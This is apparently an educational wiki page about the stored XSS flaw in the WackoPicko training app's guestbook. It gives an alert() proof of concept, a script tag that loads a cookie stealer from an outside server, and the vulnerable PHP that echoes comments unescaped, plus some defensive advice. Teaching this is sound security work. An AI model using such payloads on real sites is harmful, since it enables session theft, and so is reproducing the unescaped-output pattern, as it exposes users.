WackoPicko/Stored-XSS
| You are here: | Stored XSS
|
Description
There is a stored XSS vulnerability in the guestbook page. The comment field is not properly escaped, and therefore, an attacker can exploit this vulnerability by creating a comment containing JavaScript code. Whenever a user visits the guestbook page, the attack will be triggered and the (possibly malicious) JavaScript code executed.
More information on stored XSS attacks.
Proof of Concept
In WackoPicko, click on the "Guestbook" tab and enter <script>alert('xss');</script> in the Comment field.
By validating the form, it saves the content in the database. Each time you will click on the "Guestbook" tab, you will have a popup because the browser will execute the JavaScript code contained in the comments field.
In an attack scenario, an attacker would exploit this vulnerability to steal cookies or for other malicious actions. To test it, we will use a cookie stealer, available here: http://xqus.com/php-cookie-stealer.
This time, enter this comment (192.168.100.14 is the server where the cookie stealer has been installed):
<script src="http://192.168.100.14/cookie_stealer.php"></script>
By browsing the page, it will silently steal your cookies and save the content in the cookies.txt file located on the attacker's server.
How to detect
How to protect against it?
Code
include/guestbook.php
The function get_all_guestbooks() lists all entries from table guestbook and returns the content, without sanitizing it:
function get_all_guestbooks()
{
$query = sprintf("SELECT `id`, `name`, `comment`, `created_on` from `guestbook` ORDER BY created_on DESC;");
$res = mysql_query($query);
if ($res)
{
while ($row = mysql_fetch_assoc($res))
{
$to_return[] = $row;
}
return $to_return;
}
else
{
return False;
}
}
guestbook.php
Then page guestbook.php lists all entries returned by the previous function, without sanitizing the content of the comments. It is only applied to the names (see function h() in the next section):
<?php
if ($guestbook)
{
foreach ($guestbook as $guest)
{
?>
<p class="comment"><?= $guest["comment"] ?></p>
<p> - by <?=h( $guest["name"] ) ?> </p>
<?php
} ?>
include/functions.php
This function sanitizes the "name" but is not applied to the "comment":
function h ($str)
{
return htmlspecialchars($str);
}
The victim
Some wise advice:
- Don't trust links in your mails: Never click or double-check (analyze the real link behind the href) links you receive in your mails
The developer
A vulnerability is the result of the developer's mistake. Vulnerabilities come from:
- A lack of time during the development phase: Developers often have few days to develop an application. Under the pressure, mistakes and omissions are common.
- Poor testing phase: Often, testing phase focuses on the application's functionalities more than on security issues. Don't forget to cover this part.
- Lack of knowledge: Development is sometimes under the responsibility of beginners, which conducts to badly developed applications, especially for applications developed "from scratch". Use development frameworks that already implement security layers.